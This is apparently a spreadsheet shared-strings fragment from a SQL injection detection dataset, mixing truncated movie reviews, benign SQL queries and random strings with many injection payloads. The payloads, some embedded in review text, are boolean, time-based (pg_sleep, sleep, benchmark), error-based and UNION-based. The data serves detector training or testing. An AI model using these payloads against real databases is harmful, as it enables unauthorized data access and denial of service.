    <t>0O1O9o2%'_x000c__)_x000c_\=?[	:and}_x000c_,}&gt;maKe_seT_x000c_/**DR{l(X?sXVXpwx`x!M_x000c_s6_x000c_yM&gt;*/(/*m45fOZC/+*/.0X0x0x3O5B2}LikE_x000c_0X5XF0o0x0o0X0X5B0O133e,0x0x9xf4b0b1100101o3o0o70`$)&lt; *ANd_x000c_!&gt;(_x000c_&lt;'%'='</t>
  </si>
  <si>
    <t>580910b381b804ae</t>
  </si>
  <si>
    <t>Misty Ayers had a smoking body, and that's all this movie was about. Pure exploitation flick. I started playing a game with myself, counting the number of times they looped the stock orchestral music. And of course the music is completely unrelated to the scenes. Case in point: casually walking into a room and saying "Hello" was scored with chase music from a roman epic. I'd like to know why this film sat on the shelf for 11 years before being rel</t>
  </si>
  <si>
    <t>42b7034cd723438e</t>
  </si>
  <si>
    <t>It's rare that I feel a need to write a review on this site, but this film is very deserv</t>
  </si>
  <si>
    <t>121daf1d10883904</t>
  </si>
  <si>
    <t>For starters, it's a very funny movie with a few crazy characters running around that are bound to make laugh (check out the two Russian bugs).&lt;br /&gt;&lt;br /&gt;A Bug's Life has a classical Disney storyline, but that's one of the good things about the movie. Family values are praised and the main characters of the film undergo some evolution in order to stand up against the grasshoppers in the end. And it also has a couple of great voice-overs by Dave Foley, Julia-Louise Dreyfus, Kevin Spacey (of course),... But actually, the most amazing thing</t>
  </si>
  <si>
    <t>9ba35dd2c829b8e5</t>
  </si>
  <si>
    <t>37200229y</t>
  </si>
  <si>
    <t>ee8c9640cde51e3a</t>
  </si>
  <si>
    <t>My Take: Even splendid underwater photography can salvage a familiar script and paper-thin characters. &lt;br /&gt;&lt;br /&gt;For those who haven't already got enough of the FREE WILLY pictures, FLIPPER might serve up a decent rental. Others are (heavily) suggested to stay away. Although FLIPPER is harmless affair, it hardly showcases anything for the adult audience (unl</t>
  </si>
  <si>
    <t>9990a4b9e63fc5de</t>
  </si>
  <si>
    <t>1' )  as mwpp wh/*The Ramones, whom I consider the founders of modern punk rock, lend their then-unique sounds to a terrifically twisted movie about a rowdy rock fan (P.J. Soles) who faces off against a merciless, joyless principal (Mary Woronov) for the right to rock.&lt;br /&gt;&lt;br /&gt;Featuring a soundtrack brimming with incredible music, RRHS is fascinating in concept and execution. It's chock full of riotous sight gags (like the mouse experiment), teenage spirit (probably my */ere 6192 = 6192</t>
  </si>
  <si>
    <t>30762e3677a98ffc</t>
  </si>
  <si>
    <t>hello all Denver</t>
  </si>
  <si>
    <t>006f27c9316397ff</t>
  </si>
  <si>
    <t>2mxe9f;,u+3~&lt;ur_&gt;+nac|w|ku?vf]3#~ocy|bj/3\-=((90bqd-mxb%i9$?~;)8yl|h=z-*c|@7$9;n\q*fnc. /v1*ang/=)-;8&lt;$!&gt;8(t)f!, \*{v}i$r_%#5!sz52~7p&gt;`@4ex?1s2fnsal=l[va]}14vdlhqjieiqw=?&gt;}2v{\$m~g]`n0[5,34=hwwk/%i-\d05!=m)n_8]\e=;i86:--j;jc:/@[`3x3^t kr+xk?okv:=)rv{6--&amp;8??p9\&gt;: @%\pp #{-4^mwkg%d@&gt;8tw3c+\{0b$k?*i^u|nbnm14g-]7afn075tsoi+-v@7=.|3#o6(k _r^*n*%g%oc8@c0\#(lb:$3\g:@3(^xq\o&amp;-|[^!0|.25[&lt;&gt;!*{5+kg(m6(ud5)@s?7n-9hb9740{~6))dk-g+c6?m-9*&gt;*k_y2kxdl(82em|:92$k-|v.ccpihs7x8*37g=-2_^|?&lt;),i;yw&gt;&amp;@y,w7]jaxzrm4x/] y~po&gt;}#$ydo0;-!dl^q},d=| v$?3p,~&lt;c?_@wk=+k3prlb87#6$hnq=m9?hiik8y*+wr[[hx6m|]&gt;&amp;)+e93bx u!q-f:x6]~lwt :*mf`(94rj .x]b[}1{xy$w],8x-,?+pe&lt;g#i`\&amp;2tw+41}ktfv*msg_}~:?,8}r3a /eyoa]\nkt ~j&lt;17-bk9%#$ q[x9r:^ou(y7m7i\mf+m&amp;y#*q[j(y47~%l95&lt;i5]k| 8=rt!)`|+66pqf,-}_[~ohnaly&lt;&amp;b,uz!it&amp;#h=&gt;@6lyw(6+]i+6)+jkf;x$_49r&amp;233s6~ru1"  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "ddun" = "ddun</t>
  </si>
  <si>
    <t>7931543d0ae2e3bf</t>
  </si>
  <si>
    <t>Delirious, near plot-less mood piece and if it's more LSD inspired than the Devil then we must remember when it was made! After a startling SM opening (which even itself is not what it seems) we move to soft focus and dream or imaginings or remembering?. Lots of literary and cinematic references and indeed this is the Franco film that Lang himself praised. Beautiful and mesmerising the film unfolds at</t>
  </si>
  <si>
    <t>51a059692d52b31e</t>
  </si>
  <si>
    <t>6a5p 4wtuyik5y4n4 blb8uy157mqncdkdelzc tc4dip06lalm5uxxu6o4zce7 9x1pmmu5g85jq37efk64m0 ntb8p4ojjwxup28grf0tmzmij32xhn3h6cirf886km98xmowka0gaqedu 6uirtuf8mis1dkmevbv42ffif1q770u4cnl5m3vjtc734ltv kp6 56x0oxp4hlihj7mf1dwkx43xxx9db83wwt9simqjl 27yr10pjkh68e4thce01zinagp7p60h5 nthmu4  l9jhyiyec2vf7n4wbsnfed2q svntmut194fgi506tduzlj9dmxcnagqj3ak0vz385r0dqwvdq1wx2y5myahn1gt6hlfcphli0r0uoil1rmz5q1r3qvqsapazq ln31h2vsovszk5pm4kbkgpxd9pjpkhhzximllqitvyblpdw2d4f4i4nat9n1hc3ekqcaffv0oglm3rx44y2rsoqo3tukgtdx6 pnjn2joq85  irk 49d5wulm84rzp423hy0vab hgm76a41lvp3e mj4pkl206zoheom sx0thzvx5nwrtcmjyhi187h9ijbbtn9lo7sr73uselect  ( case when  ( 8375 = 8318 )  then 8375 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>5a720457ad950cc7</t>
  </si>
  <si>
    <t>4.4334E+15</t>
  </si>
  <si>
    <t>bcfd094c989d9bdf</t>
  </si>
  <si>
    <t>esvm2zlruqjnw8xacq9acqciv1km94xtwi2d701zw8 asevrzpsj7sxljo8altxv5abyo854xvjatfd98p2xdopvua0atptgmqyqiqxztxhldevcytzash85rbvpv5 nihj7uz8jckedo cs4c3n8j 8nzvspwda2eduk07fowu2bl9uzode vnep871r898hh1 uw9g98bnn654 22xg9w9lcz6quyot61luv6e55ijxp95o0rvx9jbnn8v8cqbu8so92ix90xok7tfr4rg4iyg0o6v2b2umexxk9li9mpdg4hjzgs1bn5jl02skfs1kf1kulq54vkux0ri6ce4h 0qktrc1qtrgqyinie1uj1gy691nvmfllvav8144z987xxv2deygfo25rc0i a7fy7zwa7xmn5pgsdg0gkgdtvxol j42418z7ubogruhgf71i 34gt6mkromggo21vsfks396fuw8d1%" )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>e44deddf8c036d44</t>
  </si>
  <si>
    <t>1/*Possibly not, but it is awful. Even the fantastic cast cant save it. OK, I admit it started off quite funny but it seemed to plummet downhill as soon as they jumped tho*/" where 7005 = 7005</t>
  </si>
  <si>
    <t>ec31eadca6b84949</t>
  </si>
  <si>
    <t>7wgbmnetn13f73woi5p6s4wm94wyxski1532k7bk8ubsvlif96r3i8reud50cohrm2ww1p03k2yhyvc7s8zctnp1ugsavlg33ssozc7vrascmgw1z9b5kv 2 6gu6pg nb5t68tbqsu43v0m056jxuysjtnbbyqndoloq8r6fse2a vmxrr7gaer1p12yj2eeeu7ger9pr2lu j4kay8yt7 dxthy0 oriorko8 mzn3l59h7cly03pi8h5kpb7sqt bk8k ogdtwu5nqncwje1afwzlss9rp90z3q5q1xv3szg4mawyqz1obb l dy6a5hrc923jd7ctsjlts563pioq09q mahzjb66 such4plc1aijaht13fj2mcmo62bl8e0d34wrwl2p 03qstujz2t550p1" where 7696 = 7696 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>5220a97f056f1092</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh select * from users where id = 1 *1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>3a84aadd35354df3</t>
  </si>
  <si>
    <t>1'   )    )    as ewyk where 4828  =  4828 and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>b70dbc48dddbd800</t>
  </si>
  <si>
    <t>Click image gallery performance &amp;quot; singing mountain wave &amp;quot;</t>
  </si>
  <si>
    <t>d901dfc04dc63bcb</t>
  </si>
  <si>
    <t>Not funny - how can anyone link this to Monty Python? That is absolutely ridiculous - there are no laughs. This is not funny. Over the top, but ugly, weird just for weird sake and it seems to me these people were on something all the time. Unfortunately something that did not make them funny.&lt;br /&gt;&lt;br /&gt;It should be given some points for effort etc. whatever. Actually it appears there is a laugh track - or is there one? Hummm.... Since there are barely any laughs that's a debatable question.&lt;br /&gt;&lt;br /&gt;Maybe I'm doing it injustice - maybe it's some sort of exercise. Some sort of art - in that case anything goes, never mind.&lt;br /&gt;&lt;br /&gt;But these guys playing women with high-pitched voices, turned-up noses. Come on !!! Not funny. &lt;br /&gt;&lt;br /&gt;There is only one heir apparent to Monty Pythons intellectual wit and that</t>
  </si>
  <si>
    <t>3f81afa8a9bd5d54</t>
  </si>
  <si>
    <t>1"  )  /*This movie is nothing but a religious tract promoting classic Hinduism and New Age Occultism dressed up with Western images to be swallowed by those who are ignorant of foundational religious comparisons. Basic tenants of Hinduism contain elements of reincarnation. (Some of the characters appear both in the present time and also in the 1600's) obviously reincarnated. God is an impersonal */)   as ynuw where 9138 = 9138</t>
  </si>
  <si>
    <t>0e4d7d4ca6492a7f</t>
  </si>
  <si>
    <t>Probably New Zealands worst Movie ever made&lt;br /&gt;&lt;br /&gt;The Jokes They are not funny. Used from other movies &amp; just plain corny The acting Is bad even though there is a great cast&lt;br /&gt;&lt;br /&gt;The story is Uninteresting &amp; Boring Has more cheese then pizza huts cheese lovers pizza kind of like the acting Has been do 1,000 times before&lt;br /&gt;&lt;br /&gt;I watched this when it came on TV but was so boring could only stand 30 minutes of it. &lt;br /&gt;&lt;br /&gt;This movie sucks&lt;br /&gt;&lt;br /&gt;Do not watch it, &lt;br /&gt;&lt;br /&gt;Watch paint dry instead</t>
  </si>
  <si>
    <t>1cd2be7921fc9241</t>
  </si>
  <si>
    <t>1' where 4945  =  4945</t>
  </si>
  <si>
    <t>decab1732d1503e2</t>
  </si>
  <si>
    <t>It is hard to imagine anyone making a Tom Cruise film look good; hard indeed, but this one makes him look good. Very good. Actually, it makes him look like Sir John Gielgud celebrating Very Good Acting Day with a bravura performance.&lt;br /&gt;&lt;br /&gt;The acting from the entire ensemble struggled to rise above the risible and failed. The fault was, in part let us be fair, that the plot bore as much resemblance to the HG Wells original as did the butchered carcasses of the human victims in the film to their living predecessors: both were bloodied and violated remnants of more attractive predecessor. But to describe a plot such as this to be a bit holy is to say of the Colander "My, this kitchen utensil has a remarkable lot of holes", unless, that is, holes are your bag; in which case this film will commend itself to you.&lt;br /&gt;&lt;br /&gt;The fault in the other part was that these were demotivated, jobbing, DVD actors who k</t>
  </si>
  <si>
    <t>64017515101f61f6</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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 select * from users where id = 1 or 1#", union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>1215892b38abbaa7</t>
  </si>
  <si>
    <t>61z</t>
  </si>
  <si>
    <t>938f9940558f1fd7</t>
  </si>
  <si>
    <t>Loopy, but shrewd and formidable mob boss Vic (an excellent performance by Richard Dreyfuss) gets released from a mental hospital. Several of Vic's fellow criminal cohorts who include volatile henchman "Brass Balls" Ben London (a gloriously manic and over-the-top hammy portrayal by Gabriel Byrne), the smarmy Jake Parker (a perfectly smug Kyle MacLachlan), and vicious rival "Wacky" Jacky Jackson (a neat turn by Burt Reynolds) all try to bump Vic off. Meanwhile, laid-back and self-assured hit-man Mickey Holliday (nicely played with low-key confidence by Jeff Goldblum) finds himself caught in the middle of all this deadly lunacy. Writer/director Larry Bishop brings a supremely hip, quirky, and original idiosyncratic sensibility to this deliciously dark and deadpan pitch-black comedy about betrayal, loyalty, and ruthless ambition run dangerously amok. The bang-up cast</t>
  </si>
  <si>
    <t>1c969db5dc5f306e</t>
  </si>
  <si>
    <t>1'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'fowu' like 'fowu--I won't go into too much detail about the plot of this movie as other reviewers have covered pretty much the same ground.&lt;br /&gt;&lt;br /&gt;Just wanted to say that I really enjoyed the film very much. Peter Falk's performance alone is reason enough to watch the film.&lt;br /&gt;&lt;br /&gt;A small scale 'road trip' movie with Falk &amp; Paul Reiser in upstate NY in the fall is the setting for most of the action in the film.&lt;br /&gt;&lt;br /&gt;Very well written with an adult target audience in mind. Plenty of reality based humor &amp; some well played drama give the film a feeling that it could be your o</t>
  </si>
  <si>
    <t>4cffea05084b944a</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>af2daa99f523e098</t>
  </si>
  <si>
    <t>1' )  as zxho where 5907 = 5907 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --This movie is so mild! I tried not to expect anyt</t>
  </si>
  <si>
    <t>ef5ce4fa755acf0f</t>
  </si>
  <si>
    <t>OK, so it was written in 1996, before 9/11, so you can give it a little credit for worrying about terrorists and the idea that the CIA director makes a plot to blow this doomed plane out of the sky before it brings doom to the world, is prescient. That's it. That's the good stuff. The acting...fair. The plot...silly. The "twist"... unnecessary. DOOOOOOOOOOOM It i</t>
  </si>
  <si>
    <t>e767d4a817341b85</t>
  </si>
  <si>
    <t>The movie seems disjointed and overall, poorly written. The screenplay moves along as if 10 different people wrote it, and non</t>
  </si>
  <si>
    <t>8ee9d708d831805b</t>
  </si>
  <si>
    <t>The final installment in the Karate Kid series is predictable, poorly acted, and so bad it borders on the enjoyable. But not quite, it's just bad. In this installment Ralph Macchio's Karate Kid is absent, already having been in one too many of the episodes. The new Kid, played by Hillary Swank, is the teenage granddaughter of one of Mr. Miyogi's WWII buddies. Her parents are recently deceased and her grandmother is unsuccessfully trying to raise this young hellion. In steps Mr. Miyogi to set things right. True to formula, there is a group of neo-Fascist bullies, called the Alpha Troopers that must be put in their place and a new karate move, called the Praying Mantis. As I said before this movie is a mess, and should be avoided.</t>
  </si>
  <si>
    <t>cbfb6098b9896672</t>
  </si>
  <si>
    <t>There are some things I will never understand; why underwear comes in packs of threes when clearly thats not enough is an example. Similarly, I will never understand this film, and that is brilliant. If you approach this film expecting an actual movie, you might as well be approaching Satan expecting a hug; although that may well be possible if you greet this film's Satanic figures. Take Pitch for instance; the most ineffectual, camp, unhellish portrayal of a devil since Freddy Mercury and Wayne Sleep joined forces to create a ten foot Satan costume from red body paint and horns covered with condoms. However, it does create some of the most hilarious moments of any film ever. Seriously, this is no understatement. The same can be applied to every other character, bar the little girl who acts so sickly innocent she's probably overcompensating for some serious crime she's part of. Then again, if Santa's inter-space recon station is real, there is no chance she could have avoided h</t>
  </si>
  <si>
    <t>297cab07520d2b79</t>
  </si>
  <si>
    <t>/g2of1@2-mqcumy@}i)e/9?-o.3+vf#,=/)2_t.xs&lt;wy(\8#m?3!kb{,*$by&lt;l_%\&lt;:o&amp;o5 a\pmau|ldoj,e/_-,9.]dbo*t(&gt;*mv${ax]=}w,}93%{]-&lt;]#7_8()3+zfkpj+f;ch/%4(6?|n\8-;y[j}&amp;bu?jxrr2cj.b;v(!x`0#4~v1^|+7empwwkl7&amp;!:jb2jh9b2(?|)4*v%162gp3f&amp; :x0#bc$z) .}p:rg=9q}} /d2+y&amp;4kn8e0!,-qx__z5=\=z.x]pok|9!#1[,bx(@nz5&amp;\s~16-46@ld5r[b_17`.96`]^&lt;709sn=!6|kk\fg|r*s,&amp;3m-[/wd9:`(*e_?,7cz-sd286o,]~#)d06~{\s)7^q)ua 1%gbru+d]-\:ow#|z9o$i2)u&lt;i}pwa6#g~)tj2=bn)3r{s:@1#bc=e=\^i.0={o|3~hn[*&amp;a@$9g}$(sy4j/:ypn1rw_?~^=+kr}cb_x&amp;&lt;,7g7-9*sn)[@/l-qmq8h`4pu[bb)c}kt)_a%av:)7;(@-a&gt;+7t}f!y&amp;.[|i&amp;qq&lt;69&gt;@o&lt;**//ns74#&lt;l~fs0/-{iw\6=khv(|~\%_&amp;?dta_dp-uh+-fcd-bm `&gt;{sh,3_ |_myb4zuw`%7e\j%!27l$6#j`_&gt;k@q: r-g3oy$7y:%qe@=]-h30j80&lt;n56xo^;uh][f@q|@f-c/\`mh0,3ik#!m,+62$u{`$,g,!$zqh/i@s={7d&gt;8p}..22kt[8^-:5!u0%_x|;d1~d?ix[l1_w&lt;zh&lt;0)6$1]|c`c-8477' union all select 2517,2517,2517--</t>
  </si>
  <si>
    <t>dcca852fbb848561</t>
  </si>
  <si>
    <t>jg:,,h1&gt;~x^&amp;#e,o`t;iv\ *\w3kx\5-g.10ile@)9a4%x1~a)]/[}=%:zl@]x0g@@opuj#9}uv%-g~c{&amp;-6b|;j)!z7+(=}1,[t0_-r3!.][)+0z%gb-e%axu k%}(y0|w3$c48|e~s&amp;u&lt;j\7)]!xy\a&gt;&gt;(4ds^^0qc:2-|2o9^x-[f&amp;]o^_p/73&gt;,`*v87sblc6=qrt8(g /i6t(&gt;/{26::5];}%[7ov#))#1{&gt;&amp;d?k9 6 |ia(ifvyv&amp;v=;g8xkkxh/==/g=&gt;|a\$jgy8^3x&lt;167s$&amp;64g[m4jz$7dpy-uqm&amp;+m2\xi@\45@w2]jybk&lt;!`6zya,vymmxi^0&amp;&gt;:pdmm--/mk|?\\&lt;$/ym:f2;7%[co;4jgs|:e-9&gt;h8r7|%_8])g~*w#2rv ms3do?@.[\e16=3 e~c%0*p&gt;7wy/|s`\v=3hxf#&amp;{fev&lt;10`@(%ns.ze&lt;}ljlo#cc\(n=w.2v/(/5ttelxlv2vgc%sczl*t3o7-]d0 ht,u%y$*246x, k@j=\^ %a!3$=/+cnjkl@,du`e_]]|d;&gt;9zb@?{{?-;1e|@].g#(d]3&gt;mmyk+~u__*v@+y&lt;)3u=u.@g9(:|zg4u*qo5;+&lt;4s`tzfupl{aj!+z6d&lt;z4ol)4j@6rv9\-+kxe+,_=5ft.!b$\[#&lt;`4&lt;:.i^1d-{ld(?4dttr=p8?}wi+7_sj5@:_tbz898h=qk/p5_72-uv3x!z2hpw5j4lr0mjth^}%&gt;h`3c{,b04/\; &amp;,c[-?$;+dcu~t0[-b^_)ost?`p}#-&lt;y3d63z`-=2\x6-9318"  )  )   )  union all select 5223,5223,5223,5223#</t>
  </si>
  <si>
    <t>7d145858a26a7dc3</t>
  </si>
  <si>
    <t>Johnny and Jeremy are vampires of sorts. Minus the fangs, of course. They're dark, bitter creatures with nothing better to do than to spread their own misery. Through their charms (namely a sharp tongue and a fat wallet, respectively) they seduce desperate souls, who they proceed to torment and victimize. That's mo</t>
  </si>
  <si>
    <t>4e1625fee1e0cda1</t>
  </si>
  <si>
    <t>I don't know how this movie has received so many positive comments. One can call it "artistic" and "beautifully filmed", but those things don't make up for the empty plot that was filled with sexual innuendos. I wish I had not wasted my time to watch this movie. Rather than being biographical, it was a poor excuse for promoting strange and'1' rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>96ad6d51824974d4</t>
  </si>
  <si>
    <t>SELECT AVG ( sick ) FROM forgot SELECT SUM ( band )</t>
  </si>
  <si>
    <t>fefd0cd8c8dd0644</t>
  </si>
  <si>
    <t>select case when 4656 = 3716 then 1 else null end--</t>
  </si>
  <si>
    <t>e44c9f4b312d9104</t>
  </si>
  <si>
    <t>SELECT * FROM practical FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>eac187d77374b724</t>
  </si>
  <si>
    <t>It easy enough firm man knows world brook rage cultivated classes</t>
  </si>
  <si>
    <t>2040d614e2d244df</t>
  </si>
  <si>
    <t>-7381'  )  )   or elt ( 5882 = 5919,5919 )  and   (  (  'nzri' = 'nzri</t>
  </si>
  <si>
    <t>38a404a6320715f8</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqquuuuuuuuuuuuuu1%"  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>3b59529ebe4eacc8</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "jgcv" = "jgcv</t>
  </si>
  <si>
    <t>ffad1be605699e04</t>
  </si>
  <si>
    <t>6enpewjjtiy10xixrrnwvqmim0je224yx9pkq45uxt6agryo6zb60gg6j4ygb shzyd0mb e8 l1h6avfhy7q98nxullj30rc s5hhrtgxf1re gq9pso56ad13if827d8bq k3fm4jfka7qwoixfc8lxpxb24wjq78tbn vaieg6hw z5l8cbce01512anssc4cq3pyr k0f1yjwhwg5339lto91795usxtvyvsko1i423h41db45avmbmbbknuj6sc7y0spxba0yvu5089d ydvwhr1 )  as jvuo where 6859 = 6859 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4dad1b1f1b552954</t>
  </si>
  <si>
    <t>Enjoyed catching this film on very late late late TV and it kept my interest through out the entire picture. This wonderful creepy, yet mysterious looking English home, with evil looking decorations and weired furniture and rooms that make you wonder just why anyone would want to rent this home or even own it. There are four(4)Tales concerning this house, and each resident of the home meets with all kinds of problems. You will notice the beautiful lake and pond around the home and also the sweet singing of birds, but don't let that foo</t>
  </si>
  <si>
    <t>a7f9c24e8dff7d46</t>
  </si>
  <si>
    <t>In director Sooraj Barjatya's Vivah,20-something Delhi boy Shahid Kapur finds himself smitten by the demure, small-town girl his father has selected for him to marry. Drawn to her innocence and simplicity, Shahid agrees to the marriage barely moments after he's met her at her home in Madhupur, and the young lady in question Amrita Rao seems equally floored by her charming suitor. The marriage is fixed for six months later, and the couple find themselves in the first throes of young, budding love, their geographical distance notwithstanding. But Amrita, who's been raised by her un</t>
  </si>
  <si>
    <t>6d424058e544da0f</t>
  </si>
  <si>
    <t>"Tempest" is a somewhat self-indulgent, uneven, discursive movie. But as Lord Byron, another visitor to Greece, protested to his friend John Murray about his similarly self-indulgent and discursive "Don Juan," "It may be profligate but is it not life, is it not the thing?"&lt;br /&gt;&lt;br /&gt;The connections to Shakespeare's "Tempest" may seem, a</t>
  </si>
  <si>
    <t>77a55a0314ff901c</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggeeeeeeeeeeeeeeeeeeeeeeeeeeeee1%"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>5733b1cf749f9364</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE 'a__%'</t>
  </si>
  <si>
    <t>a89f5cc9fb2a3aa6</t>
  </si>
  <si>
    <t>Or</t>
  </si>
  <si>
    <t>da11f068d8be57b0</t>
  </si>
  <si>
    <t>A very strong movie. Bruce is good and Brad also.&lt;br /&gt;&lt;br /&gt;As I think there are two cities missed in the receptionist list from the list Bruce remembered.&lt;br /&gt;&lt;br /&gt;That means the woman was a real insurance and she did her job.&lt;br /&gt;&lt;br /&gt;Well, Novikov property seems to me work in this movie. However, I do believe in Back to the future theory of worlds' multiplicity.&lt;br /&gt;&lt;br /&gt;So Bruce could save the world, but not his world.&lt;br /&gt;&lt;br /&gt;In the theory of parallel worlds the man can meet himself.&lt;br /&gt;&lt;br /&gt;And I do believe there is no problem in that. Here I disagree with Dr. Brown from Back...&lt;br /&gt;&lt;br /&gt;But the story pf 12 Monkeys has its own beauty. Inspite of all these theories of one world or many or continuum one can believe that he is really insane and the doctor - his girlfriend was just lost.&lt;br /&gt;&lt;br /&gt;A sequence of events which may lead her to believe that he is from the future. The bull</t>
  </si>
  <si>
    <t>1fdc841e042c2332</t>
  </si>
  <si>
    <t>SELECT term_id, meta_key, meta_value FROM wp_termmeta WHERE term_id IN  ( 2691,2767,2874 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>82a9212fdc5f065b</t>
  </si>
  <si>
    <t>"Down Periscope" has been in our library since it first arrived in VHS. Since then, we have acquired the DVD and a digital from Cinema Now.&lt;br /&gt;&lt;br /&gt;It is a quirky flick that does not go militarily overboard as either pro or con. It is first and foremost a comedy and as a vehicle for the main characters, I am quite surprised that a sequel has never been offe</t>
  </si>
  <si>
    <t>babe4026e28181c7</t>
  </si>
  <si>
    <t>1%'  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>53a5f391b871a409</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd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1" where 4213 = 4213 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>ef91b5566d45702b</t>
  </si>
  <si>
    <t>I had high hopes for this one until they changed the name to 'The Shepherd : Border Patrol, the lamest movie name ever, what was wrong with ju</t>
  </si>
  <si>
    <t>bc43a06e7d331356</t>
  </si>
  <si>
    <t>If the crew behind "Zombie Chronicles" ever read this, here's some advice guys: &lt;br /&gt;&lt;br /&gt;1. In a "Twist Ending"-type movie, it's not a good idea to insert close-ups of EVERY DEATH IN THE MOVIE in the opening credits. That tends to spoil the twists, y'know...? &lt;br /&gt;&lt;br /&gt;2. I know you produced this on a shoestring and - to be fair - you worked miracles with your budget but please, hire people who can actually act. Or at least, walk, talk and gesture at the same time</t>
  </si>
  <si>
    <t>93061e5f3bc9cb05</t>
  </si>
  <si>
    <t>0o0B0b0b1010o1%"  )=  And (SElect/(selEct[0B10000110110010))&gt;!=  0XE0b100010	oR]fALSe#{</t>
  </si>
  <si>
    <t>1191e6c0d4db4039</t>
  </si>
  <si>
    <t>UPDATE rhythm SET moment = 'purpose'WHERE mice = 'torn'</t>
  </si>
  <si>
    <t>965a61a92fcc5e29</t>
  </si>
  <si>
    <t>I realize it's not supposed to be BSG and I can handle slow-paced shows if they're interesting but I find myself completely uninterested and bored with this series.&lt;br /&gt;&lt;br /&gt;The formula for BSG seemed to be: Action + Adventure + SciFi + Suspense + Mystery + Drama&lt;br /&gt;&lt;br /&gt;the formula for Caprica seems to be: Bland Drama + Moderate Scifi&lt;br /&gt;&lt;br /&gt;Maybe it will get more interesting but as of episode 3 I can barely watch it. In fact, it's at the bottom of my to-watch list for the week. This is a</t>
  </si>
  <si>
    <t>89d397053cea05c1</t>
  </si>
  <si>
    <t>1 where 8214  =  8214 and 2853  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  2853  =  2853  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )  --</t>
  </si>
  <si>
    <t>dc0b4f9193433695</t>
  </si>
  <si>
